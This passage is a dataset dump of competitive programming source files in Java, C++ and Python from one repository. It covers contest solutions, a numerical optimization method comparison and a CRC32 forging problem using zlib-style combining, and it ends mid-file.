"alphanum_fraction": 0.3985568881034851, "avg_line_length": 24.053192138671875, "blob_id": "327df94434288d2665af6209f6d30a099ae39c55", "content_id": "aa0236ba001a2dc385e0a9c2716a210725c84e61", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 2356, "license_type": "no_license", "max_line_length": 80, "num_lines": 94, "path": "/trains/neerc/neerc.ifmo.ru.train.2013.10.29/K.java", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "\nimport java.io.*;\nimport java.util.*;\n\npublic class K {\n\n final static String task_name = \"stdin\";\n\n void run() throws IOException {\n int n = nextInt();\n int[] d = new int[n];\n for (int i = 0; i < n; i++) {\n d[i] = nextInt();\n }\n ArrayList<String> ans = new ArrayList<String>(n);\n\n for (int r, x, y, l = 0; l < n;) {\n r = l;\n while (r < n) {\n if (d[r] <= r - l) {\n r--;\n break;\n }\n r++;\n }\n x = r - l + 1;\n\n y = n;\n r = l;\n while (y > 0 && r < n) {\n y = Math.min(y - 1, d[r] - 1);\n if (y <= 0) {\n break;\n }\n r++;\n }\n\n y = r - l + 1;\n\n if (l + x >= n) {\n x = n - l;\n }\n if (l + y >= n) {\n y = n - l;\n }\n\n // pw.println(x + \" \" + y);\n\n if (x > y) {\n ans.add((l + 1) + \" \" + (l + x));\n l += x;\n } else {\n ans.add((l + y) + \" \" + (l + 1));\n l += y;\n }\n }\n\n pw.println(ans.size());\n for (String s : ans) {\n pw.println(s);\n }\n\n }\n\n String next() throws IOException {\n while (st == null || !st.hasMoreTokens())\n st = new StringTokenizer(br.readLine());\n return st.nextToken();\n }\n\n int nextInt() throws IOException {\n return Integer.parseInt(next());\n }\n\n String nextLine() throws IOException {\n return br.readLine();\n }\n\n static PrintWriter pw;\n static BufferedReader br;\n static StringTokenizer st;\n\n public static void main(String[] args) throws IOException {\n long timeout = System.currentTimeMillis();\n // br = new BufferedReader(new FileReader(new File(task_name + \".in\")));\n // pw = new PrintWriter(new FileWriter(new File(task_name + \".out\")));\n // while (br.ready())\n br = new BufferedReader(new InputStreamReader(System.in));\n pw = new PrintWriter(System.out);\n new K().run();\n // System.out.println(System.currentTimeMillis() - timeout);\n br.close();\n pw.close();\n }\n}\n" }, { "alpha_fraction": 0.3723487854003906, "alphanum_fraction": 0.393558531999588, "avg_line_length": 15.113924026489258, "blob_id": "6ecca311afa1fbb87700cfc1feddf3594d7a61a9", "content_id": "c3f8b1dd6a8fcc16c7d921d0ac60514cd7e6dd01", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1273, "license_type": "no_license", "max_line_length": 44, "num_lines": 79, "path": "/trains/neerc/neerc.ifmo.ru.train.2013.10.08/B.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stack>\n#include <vector>\n#include <stdio.h>\n#include <queue>\n#define north printf(\"NORTH\\n\"); cin >> s;\n#define west printf(\"WEST\\n\"); cin >> s;\n#define east printf(\"EAST\\n\"); cin >> s;\n#define south printf(\"SOUTH\\n\"); cin >> s;\n#define done printf(\"DONE\\n\"); cin >> s;\n#define ss if(s == \"EMPTY\")\n\n\nusing namespace std;\n\nint a[101][101];\nstring s;\n\nvoid bfs(int i, int j)\n{\n a[i][j] = 1;\n if (!a[i - 1][j])\n {\n north\n ss\n {\n bfs(i - 1, j);\n south\n } else\n a[i - 1][j] = 2;\n }\n if (!a[i + 1][j])\n {\n south\n ss\n {\n bfs(i + 1, j);\n north\n } else\n a[i + 1][j] = 2;\n }\n if (!a[i][j + 1])\n {\n east\n ss\n {\n bfs(i, j + 1);\n west\n } else\n a[i][j + 1] = 2;\n }\n if (!a[i][j - 1])\n {\n west\n ss\n {\n bfs(i, j - 1);\n east\n } else\n a[i][j] = 2;\n }\n}\n\nvoid run()\n{\n string s;\n int i = 50, j = 50;\n bfs(i, j);\n done\n}\n\nint main()\n{\n// freopen(\"matching.in\", \"r\", stdin);\n // freopen(\"matching.out\", \"w+\", stdout);\n run();\n return 0;\n}\n" }, { "alpha_fraction": 0.4007633626461029, "alphanum_fraction": 0.4198473393917084, "avg_line_length": 31.75, "blob_id": "47d87cdec038dbd0b38459c568b225344a7632c3", "content_id": "38a8607d42d3db31df42f95623845a7db8cd3802", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 262, "license_type": "no_license", "max_line_length": 68, "num_lines": 8, "path": "/CodeForce/0544/B.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "n, k = map(int, input().split())\ns = [['S'] * n for i in range(n)]\nfor i in range(n):\n for j in range(n):\n if k > 0 and (i + j) % 2 == 0:\n s[i][j] = 'L'\n k -= 1\nprint('NO' if k > 0 else 'YES\\n' + '\\n'.join(''.join(x) for x in s))\n" }, { "alpha_fraction": 0.38260868191719055, "alphanum_fraction": 0.426086962223053, "avg_line_length": 19.909090042114258, "blob_id": "5892fbc9d3f15daa15e8d7add02f86fd7db3e0b2", "content_id": "ef637208fea2ddca47a151d6e9b8d3a85e2b6d57", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 460, "license_type": "no_license", "max_line_length": 42, "num_lines": 22, "path": "/CodeForce/gym/101090/K.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "def ok(n, m):\n if n == 1 or m == 1:\n return False\n if n == 2:\n return m % 3 == 0\n if m == 2:\n return n % 3 == 0\n\n if n % 2 == 0 and m % 3 == 0:\n return True\n if n % 3 == 0 and m % 2 == 0:\n return True\n if n % 6 == 0:\n return True\n if m % 6 == 0:\n return True\n return False\n\n\nfor T in range(int(input())):\n n, m = list(map(int, input().split()))\n print('Yes' if ok(n, m) else 'No')\n" }, { "alpha_fraction": 0.4888093173503876, "alphanum_fraction": 0.5071620345115662, "avg_line_length": 30.91428565979004, "blob_id": "663eba0df2b564f890c7bd10b2efa2d91420e730", "content_id": "3820ccce215e5e032a44dabdda9d3868df3efdbf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4468, "license_type": "no_license", "max_line_length": 174, "num_lines": 140, "path": "/2022/snws4/B.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n#ifdef ONLINE_JUDGE\n#pragma GCC target(\"avx2,bmi,bmi2,lzcnt,popcnt\")\n#endif\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//}}}\nconst int N = 4096;\nconst int Z = 26;\nconst int M = N + N;\nint a[M][Z];\nint sum[M];\nint pref[M][Z + 1];\nint temp[N];\n\nvoid run()\n{\n ints(n, q);\n vector<vector<pii>> g(n);\n fori(n - 1)\n {\n ints(u, v); --u; --v; char c; readln(c);\n g[u].pb({v, c - 'a'});\n g[v].pb({u, c - 'a'});\n }\n fori(n)\n sort(all(g[i]), [](const pii& a, const pii& b) {\n return pair(a.second, a.first) < pair(b.second, b.first);\n });\n\n auto getAutomaton = [&](int S) {\n fori(M) forj(Z) a[i][j] = -1;\n fori(M) sum[i] = 0;\n fori(N) temp[i] = 0;\n int sz = 1;\n auto dfs = [&](auto dfs, int u, int root, int p) -> void {\n if (root)\n sum[root]++;\n for (auto& [v, c]: g[u])\n if (v != p)\n {\n if (a[root][c] == -1)\n a[root][c] = sz++;\n dfs(dfs, v, a[root][c], u);\n }\n };\n dfs(dfs, S, 0, -1);\n\n auto getCount = [&](auto getCount, int root) -> int {\n pref[root][0] = sum[root];\n fori(Z)\n pref[root][i + 1] = pref[root][i] + (a[root][i] == -1 ? 0 : getCount(getCount, a[root][i]));\n return pref[root][Z];\n };\n getCount(getCount, 0);\n\n auto getAns = [&](auto getAns, int u, int root, int p) -> void {\n for (auto& [v, c]: g[u])\n if (v != p)\n {\n temp[v] = temp[u] + pref[root][c];\n getAns(getAns, v, a[root][c], u);\n }\n };\n getAns(getAns, S, 0, -1);\n };\n vector<pii> requests(q);\n readln(requests);\n vector<int> order(q);\n iota(all(order), 0);\n sort(all(order), [&](const int& a, const int& b) {\n return requests[a] < requests[b];\n });\n vector<int> ans(q);\n int prev = -1;\n\n for (const int& i: order)\n {\n auto& [S, F] = requests[i]; --S; --F;\n if (S != prev)\n {\n getAutomaton(S);\n prev = S;\n }\n ans[i] = temp[F];\n }\n for (int x: ans)\n writeln(x);\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.577464759349823, "alphanum_fraction": 0.5985915660858154, "avg_line_length": 46.33333206176758, "blob_id": "a492a4353a7b638165ce77ce24de2b009fa5cd9e", "content_id": "a6d37f7a947bf23c7440b5d8ad47c7f84b8f6b9b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 142, "license_type": "no_license", "max_line_length": 91, "num_lines": 3, "path": "/2018/yalgoQual/A.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "a = input().split()\nfor i in range(int(input())):\n print(\"Unlucky\" if sum([1 if x in a else 0 for x in input().split()]) < 3 else \"Lucky\")\n" }, { "alpha_fraction": 0.41621044278144836, "alphanum_fraction": 0.4769662022590637, "avg_line_length": 30.200000762939453, "blob_id": "a28a2386219646b4aa3afdf02c83bd9d53f20f9a", "content_id": "2d8976d3eb2909c4ec08884b97f7972376124fc9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 7489, "license_type": "no_license", "max_line_length": 134, "num_lines": 240, "path": "/Ann/multi2.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <bits/stdc++.h>\n#include <ctime>\n\nusing namespace std;\nusing namespace std::placeholders;\n\nstatic const double eps = 0.01;\nstatic const double delta = 0.001;\nstatic const double l = -10., r = 10.;\nstatic const double q11 = 3., q12 = -3., q22 = 4., r1 = -2., r2 = 1.;\n\ndouble f(double x1, double x2)\n{\n return q11 * x1 * x1 + q12 * x1 * x2 + q22 * x2 * x2 + r1 * x1 + r2 * x2;\n /* _ _\n | / 6 -3 \\ * /f1\\ | x /f1\\ = 6*f1*f1-3*f2*f1-3*f1*f2+8*f2*f2\n |_ \\ -3 8 / \\f2/ _| \\f2/\n */\n\n /*\n H = / 6 -3 \\ ; -1 = 1 / 8 3 \\\n \\-3 8 / H 39 \\ 3 6 /\n */\n}\n\ndouble ftemp(std::function<double(double)> f)\n{\r\n auto ff = [f](double x){ return (f(x + delta) - f(x)) / delta;};\n double xk, xprev = r, xprevprev = l;\n do\n {\n xk = xprev - (xprev - xprevprev) * ff(xprev) / (ff(xprev) - ff(xprevprev));\n xprevprev = xprev;\n xprev = xk;\n }\n while (fabs(ff(xk)) > eps);\n return xk;\n}\n\ndouble fx1(double x1, double x2)\n{\n return (f(x1 + delta, x2) - f(x1, x2)) / delta;\n}\n\ndouble fx2(double x1, double x2)\n{\n return (f(x1, x2 + delta) - f(x1, x2)) / delta;\n}\n\nbool check(double x1, double x2)\n{\n return (fabs(fx1(x1, x2)) <= eps && fabs(fx2(x1, x2)) <= eps);\n}\n\npair<double, double> coordinateDown()\n{\n double x1 = 0., x2 = 0.;\n int countOfOperations = 0;\n double start = clock();\n double x, temp, mn, val;\n while (!check(x1, x2))\n {\n countOfOperations++;\n x1 = ftemp(bind(f, _1, x2));\n x2 = ftemp(bind(f, x1, _1));\n }\n cout << \"count of operations = \" << countOfOperations << endl << \"time = \" << (clock() - start) / CLOCKS_PER_SEC << endl;\n return {x1, x2};\n}\n\npair<double, double> gradientDownFragmentation()\n{\n double x1 = 0., x2 = 0.;\n int countOfOperations = 0;\n double start = clock();\n double alpha = 1, x11, x21, t;\n while (!check(x1, x2))\n {\n countOfOperations++;\n t = f(x1, x2);\n while (true)\n {\n x11 = x1 - alpha * fx1(x1, x2);\n x21 = x2 - alpha * fx2(x1, x2);\n if (f(x11, x21) > t)\n alpha /= 2;\n else\n break;\n }\n x1 = x11;\n x2 = x21;\n }\n cout << \"count of operations = \" << countOfOperations << endl << \"time = \" << (clock() - start) / CLOCKS_PER_SEC << endl;\n return {x1, x2};\n}\n\npair<double, double> gradientDownConst()\n{\n double x1 = 0., x2 = 0.;\n int countOfOperations = 0;\n double start = clock();\n double alpha = 0.1;\n while (!check(x1, x2))\n {\n countOfOperations++;\n x1 = x1 - alpha * fx1(x1, x2);\n x2 = x2 - alpha * fx2(x1, x2);\n }\n cout << \"count of operations = \" << countOfOperations << endl << \"time = \" << (clock() - start) / CLOCKS_PER_SEC << endl;\n return {x1, x2};\n}\n\npair<double, double> fastestGradientDown()\n{\n double x1 = 0., x2 = 0.;\n int countOfOperations = 0;\n double start = clock();\n double alpha = 1, x11, x21, f1, f2;\n auto fun = [&x1, &x2](double lambda){return f(x1 - lambda * fx1(x1, x2), x2 - lambda * fx2(x1, x2));};\n while (!check(x1, x2))\n {\n countOfOperations++;\n f1 = fx1(x1, x2);\n f2 = fx2(x1, x2);\n alpha = ftemp(bind(fun, _1));\n x1 = x1 - alpha * f1;\n x2 = x2 - alpha * f2;\n }\n cout << \"count of operations = \" << countOfOperations << endl << \"time = \" << (clock() - start) / CLOCKS_PER_SEC << endl;\n return {x1, x2};\n}\n\npair<double, double> soprDirection()\n{\n double x1 = 0., x2 = 0.;\n int countOfOperations = 1;\n double start = clock();\n double alpha = 1, beta = 0;\n double f1, f2, p1, p2, f1p, f2p;\n p1 = f1 = fx1(x1, x2);\n p2 = f2 = fx2(x1, x2);\n auto fun = [&x1, &x2, &p1, &p2](double lambda){return f(x1 - lambda * p1, x2 - lambda * p2);};\n alpha = ftemp(bind(fun, _1));\n x1 = x1 - alpha * p1;\n x2 = x2 - alpha * p2;\n while (!check(x1, x2))\n {\n countOfOperations++;\n f1p = f1;\n f2p = f2;\n f1 = fx1(x1, x2);\n f2 = fx2(x1, x2);\n beta = (f1 * f1 + f2 * f2) / (f1p * f1p + f2p * f2p);\n p1 = f1 + beta * p1;\n p2 = f2 + beta * p2;\n alpha = ftemp(bind(fun, _1));\n if (f(x1, x2) <= f(x1 - alpha * p1, x2 - alpha * p2))\n {\n p1 = f1;\n p2 = f2;\n alpha = ftemp(bind(fun, _1));\n }\n x2 = x2 - alpha * p2;\n x1 = x1 - alpha * p1;\n }\n cout << \"count of operations = \" << countOfOperations << endl << \"time = \" << (clock() - start) / CLOCKS_PER_SEC << endl;\n return {x1, x2};\n}\n\npair<double, double> Gradppor()\n{\n double x1 = 0., x2 = 0.;\n int countOfOperations = 1;\n double start = clock();\n double alpha = 1, beta = 0;\n double f1, f2, p1, p2, f1p, f2p, a = 1., b = 0., c = 0., d = 1., q, w, e, r, t, y, u, s, v, h, g, y1, y2;\n auto fun = [&x1, &x2, &p1, &p2](double lambda){return f(x1 - lambda * p1, x2 - lambda * p2);};\n while (!check(x1, x2))\n {\n countOfOperations++;\n f1 = fx1(x1, x2);\n f2 = fx2(x1, x2);\n p1 = a * f1 + b * f2;\n p2 = c * f1 + d * f2;\n alpha = ftemp(bind(fun, _1));\n x1 = x1 - alpha * p1;\n x2 = x2 - alpha * p2;\n y1 = fx1(x1, x2) - f1;\n y2 = fx2(x1, x2) - f2;\n q = a * y1 + b * y2;\n w = c * y1 + d * y2;\n u = q * y1 + w * y2;\n e = (q * y1 * a + q * y2 * c) / u;\n r = (q * y1 * b + q * y2 * d) / u;\n t = (w * y1 * a + w * y2 * c) / u;\n y = (w * y1 * b + w * y2 * d) / u;\n u = (p1 * y1 + p2 * y2) / alpha;\n s = (p1 * p1 * a + p1 * p2 * b) / u;\n v = (p1 * p1 * c + p1 * p2 * d) / u;\n h = (p1 * p2 * a + p2 * p2 * b) / u;\n g = (p1 * p2 * c + p2 * p2 * d) / u;\n a = a - e + s;\n b = b - r + v;\n c = c - t + h;\n d = d - y + g;\n }\n cout << \"count of operations = \" << countOfOperations << endl << \"time = \" << (clock() - start) / CLOCKS_PER_SEC << endl;\n return {x1, x2};\n}\n\npair<double, double> newton()\n{\n double x1 = 0., x2 = 0.;\n int countOfOperations = 0;\n double start = clock(), f1, f2, x11, x21;\n while (!check(x1, x2))\n {\n countOfOperations++;\n f1 = fx1(x1, x2);\n f2 = fx2(x1, x2);\n x1 = x1 - (f1 * 2 * q22 - f2 * q12) / (4 * q11 * q22 - q12 * q12);\n x2 = x2 - (-f1 * q12 + f2 * 2 * q11) / (4 * q11 * q22 - q12 * q12);\n }\n cout << \"count of operations = \" << countOfOperations << endl << \"time = \" << (clock() - start) / CLOCKS_PER_SEC << endl;\n return {x1, x2};\n}\n\nint main()\n{\n pair<double, double> temp;\n cout.precision(3);\n cout << \"coordinate down:\\n\" << (temp = coordinateDown()).first << \" \" << temp.second << endl << endl;\n cout << \"gradient down with const:\\n\" << (temp = gradientDownConst()).first << \" \" << temp.second << endl << endl;\n cout << \"gradient down with fragmentation:\\n\" << (temp = gradientDownFragmentation()).first << \" \" << temp.second << endl << endl;\n cout << \"fastest gradient down:\\n\" << (temp = fastestGradientDown()).first << \" \" << temp.second << endl << endl;\n cout << \"sopr direction(Fletchera-Rivsa):\\n\" << (temp = soprDirection()).first << \" \" << temp.second << endl << endl;\n cout << \"newton:\\n\" << (temp = newton()).first << \" \" << temp.second << endl << endl;\n cout << \"gradient p poryadka:\\n\" << (temp = Gradppor()).first << \" \" << temp.second << endl << endl;\n return 0;\n}\n" }, { "alpha_fraction": 0.3856837749481201, "alphanum_fraction": 0.39316239953041077, "avg_line_length": 22.399999618530273, "blob_id": "abaf9d01d2668bd35efe771e3d7b54e9d2ef6b60", "content_id": "aceb2f15b4ba6d75fe89832fd041ca8104c60c0d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 936, "license_type": "no_license", "max_line_length": 48, "num_lines": 40, "path": "/CodeForce/0938/D.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define ll long long\n\nint main()\n{\n ios_base::sync_with_stdio(false);\n int n, m;\n cin >> n >> m;\n vector<vector<pair<ll, int>>> g(n);\n for (int i = 0; i < m; ++i)\n {\n int u, v; ll w;\n cin >> u >> v >> w; --u; --v;\n g[u].emplace_back(w, v);\n g[v].emplace_back(w, u);\n }\n vector<ll> d(n);\n set<pair<ll, int>> q;\n for (int i = 0; i < n; ++i)\n cin >> d[i],\n q.insert({d[i], i});\n vector<bool> used(n, false);\n while (!q.empty())\n {\n auto [dist, u] = *q.begin();\n q.erase(q.begin());\n used[u] = true;\n for (auto& [w, v] : g[u])\n if (!used[v] && d[v] > dist + 2 * w)\n q.erase({d[v], v}),\n d[v] = dist + 2 * w,\n q.insert({d[v], v});\n }\n for (int i = 0; i < n; ++i)\n cout << d[i] << \" \\n\"[i == n - 1];\n return 0;\n}\n" }, { "alpha_fraction": 0.46660295128822327, "alphanum_fraction": 0.49357545375823975, "avg_line_length": 28.064815521240234, "blob_id": "ec2dd13e6208c01af5e6b13fb991bec5b7a11b6a", "content_id": "5bdfdc9798f785110c8c7110f380915fc654c021", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 9417, "license_type": "no_license", "max_line_length": 174, "num_lines": 324, "path": "/CodeForce/1275/E1.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 14 september 2019 (writeln<T>, main) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define whole(a) begin(a), end(a)\n#define next next__\n#define prev prev__\n#define count count__\n\n#define ints(a...) int a; readln(a)\n#define wr(args...) err(#args, args)\n\n#define ttt12i template<class T1, class T2> inline\n#define tthti template<class H, class...T> inline\n#define ttta template<class... Args> inline\n#define ttti template<class T> inline\n\nconst int MOD = 1000000007;\nconst int INTMAX = numeric_limits<int>::max();\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\nttta void readln(Args&... args){(read(args),...);}tthti void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\nvector<string>split(string&s,string d){vector<string>v;size_t p=0;while((p=s.find(d))!=string::npos)v.pb(s.substr(0,p)),s.erase(0,p+d.length());v.pb(s);return v;}\nttta void err(string v,Args...args){auto vv=split(v,\", \");auto it=vv.begin();(writeln(*it++,\"=\",args),...);}\n\n//Igorjan\n#define CRCPOLY 0xEDB88320\n#define INITXOR 0xFFFFFFFF\n#define FINALXOR 0xFFFFFFFF\n#define uint unsigned int\nvector<uint> table(256), rev_table(256);\n\nvoid make_crc_table() {\n uint c;\n fori(256)\n {\n c = i;\n forj(8)\n if (c & 1)\n c = CRCPOLY ^ (c >> 1);\n else\n c >>= 1;\n table[i] = c;\n }\n}\n\nvoid make_crc_revtable() {\n uint c;\n fori(256)\n {\n c = i << 24;\n forj(8)\n if (c & 0x80000000)\n c = ((c ^ CRCPOLY) << 1) | 1;\n else\n c <<= 1;\n rev_table[i] = c;\n }\n}\n\ntemplate <typename InputIterator>\nuint calc_crc(InputIterator first, InputIterator last)\n{\n uint crcreg = INITXOR;\n for (auto it = first; it != last; ++it)\n crcreg = (crcreg >> 8) ^ table[((crcreg ^ *it) & 0xFF)];\n return crcreg;\n}\n\ntemplate <typename InputIterator>\nuint calc_crc_all(InputIterator first, InputIterator last)\n{\n return calc_crc(first, last) ^ FINALXOR;\n}\n\n//https://github.com/madler/zlib (c)\n#define SIZE 32\n\nuint mtimes(vector<uint>& mat, uint vec)\n{\n uint sum = 0;\n int i = 0;\n while (vec) {\n if (vec & 1)\n sum ^= mat[i];\n vec >>= 1;\n i++;\n }\n return sum;\n}\n\nvoid msquare(vector<uint>& square, vector<uint>& mat)\n{\n fori(SIZE)\n square[i] = mtimes(mat, mat[i]);\n}\n\nvector<uint> EVEN, ODD;\n\nuint crc32_combine(uint crc1, uint crc2, int len2)\n{\n vector<uint> even = EVEN;\n vector<uint> odd = ODD;\n if (len2 <= 0)\n return crc1;\n do {\n msquare(even, odd);\n if (len2 & 1)\n crc1 = mtimes(even, crc1);\n len2 >>= 1;\n\n if (len2 == 0)\n break;\n\n msquare(odd, even);\n if (len2 & 1)\n crc1 = mtimes(odd, crc1);\n len2 >>= 1;\n\n } while (len2 != 0);\n\n crc1 ^= crc2;\n return crc1;\n}\n\n//IgorjansparseTable\n//0-indexed, [l, r)\ntemplate<typename T>\nstruct sparseTable\n{\n int n;\n vector<vector<T>> st;\n vector<int> logs;\n typedef function<T (T, T, int)> F;\n F f;\n\n sparseTable(vector<T>& a, F g, function<uint(int)> init)\n {\n n = a.size();\n f = g;\n\n logs.push_back(0);\n logs.push_back(0);\n FOR(i, 2, n + 1) logs.push_back(logs[i / 2] + 1);\n int L = logs.back() + 1;\n st.resize(L, vector<T>(n));\n fori(n)\n st[0][i] = init(i);\n FOR(k, 1, L)\n for (int i = 0; i + (1 << k) <= n; i++)\n st[k][i] = f(st[k - 1][i], st[k - 1][i + (1 << (k - 1))], 1 << (k - 1));\n }\n\n T get(int l, int r)\n {\n T sum = 0;\n for (int j = logs.back(); j >= 0; j--) {\n if ((1 << j) <= r - l + 1) {\n sum = f(sum, st[j][l], 1 << j);\n l += 1 << j;\n }\n }\n return sum;\n }\n};\n//}}}\n\nstruct request\n{\n int i, j, id, crc, l;\n vector<uint> x = {0, 0, 0, 0};\n vector<uint> ans = {0, 0, 0, 0};\n};\n\nistream& operator>>(istream& is, request& r)\n{\n is >> r.i >> r.j >> r.x[0] >> r.x[1] >> r.x[2] >> r.x[3];\n r.crc = calc_crc_all(whole(r.x));\n r.l = r.j - r.i - 4;\n return is;\n}\n\nostream& operator<<(ostream& os, const request& r)\n{\n return os << r.i << \" \" << r.j << \" \" << r.x[0] << \" \" << r.x[1] << \" \" << r.x[2] << \" \" << r.x[3];\n}\n\nvoid run()\n{\n make_crc_table();\n make_crc_revtable();\n EVEN.resize(SIZE);\n ODD.resize(SIZE);\n ODD[0] = CRCPOLY;\n uint row = 1;\n fori1(SIZE) {\n ODD[i] = row;\n row <<= 1;\n }\n\n msquare(EVEN, ODD);\n msquare(ODD, EVEN);\n\n ints(n, q);\n vector<uint> a(n);\n readln(a);\n uint crc = calc_crc_all(whole(a));\n sparseTable<uint> t(a, crc32_combine, [&](int i) { return calc_crc_all(a.begin() + i, a.begin() + i + 1); });\n\n vector<request> requests(q);\n readln(requests); fori(q) requests[i].id = i;\n sort(whole(requests), [](const request& a, const request& b) { return a.j > b.j; });\n //{\n //vector<uint> b = a;\n //reverse(whole(b));\n //sparseTable<uint> tt(b, crc32_combine, [&](int i) { return (INITXOR << 8) ^ rev_table[INITXOR >> 24] ^ a[i] ^ FINALXOR; });\n //uint crcreg = INITXOR;\n //fori(n)\n //{\n //crcreg = (crcreg << 8) ^ rev_table[crcreg >> 24] ^ a[i];\n //printf(\"%x\\n%x\\n\\n\", crcreg ^ FINALXOR, tt.get(0, i));\n //}\n //return;\n //}\n\n auto dumpValue = [&](uint value, vector<uint>& ans) {\n forn(k, 4) ans[k] = (value >> k * 8) & 0xFF;\n };\n\n int i = 0;\n uint crcreg = crc ^ FINALXOR;\n for (int j = n - 1; j >= 0; --j)\n {\n for ( ; i < q && requests[i].i < requests[i].j && requests[i].j + 3 == j; ++i)\n {\n auto& r = requests[i];\n uint cur = r.crc;\n if (r.i)\n cur = crc32_combine(t.get(0, r.i - 1), cur, 4);\n if (r.i + 4 < r.j)\n cur = crc32_combine(cur, t.get(r.i + 4, r.j - 1), r.l);\n uint AZB = t.get(0, r.j - 1);\n forn(k, 4) r.x[k] ^= a[r.i + k];\n uint Z = calc_crc_all(whole(r.x));\n Z = crc32_combine(Z, 0, r.l);\n printf(\"%x\\n%x\\n\\n\", cur ^ FINALXOR, AZB ^ Z);\n dumpValue(cur ^ FINALXOR, r.ans);\n\n uint tcrcreg = crcreg;\n forn(k, 4) tcrcreg = (tcrcreg << 8) ^ rev_table[tcrcreg >> 24] ^ r.ans[3 - k];\n dumpValue(tcrcreg, r.ans);\n }\n crcreg = (crcreg << 8) ^ rev_table[crcreg >> 24] ^ a[j];\n }\n\n sort(whole(requests), [](const request& a, const request& b) { return a.id < b.id; });\n fori(q)\n if (auto& r = requests[i]; r.i > r.j)\n {\n uint crcreg = 0;\n if (r.j)\n crcreg = t.get(0, r.j - 1);\n dumpValue(crcreg ^ FINALXOR, r.ans);\n\n uint tcrcreg = crc ^ FINALXOR;\n for (int k = n - 1; k >= r.i + 4; --k)\n tcrcreg = (tcrcreg << 8) ^ rev_table[tcrcreg >> 24] ^ a[k];\n for (int k = 3; k >= 0; --k)\n tcrcreg = (tcrcreg << 8) ^ rev_table[tcrcreg >> 24] ^ r.x[k];\n for (int k = r.i - 1; k >= r.j + 4; --k)\n tcrcreg = (tcrcreg << 8) ^ rev_table[tcrcreg >> 24] ^ a[k];\n for (int k = 3; k >= 0; --k)\n tcrcreg = (tcrcreg << 8) ^ rev_table[tcrcreg >> 24] ^ r.ans[k];\n dumpValue(tcrcreg, r.ans);\n }\n //{\n //uint crcreg = calc_crc(a.begin(), 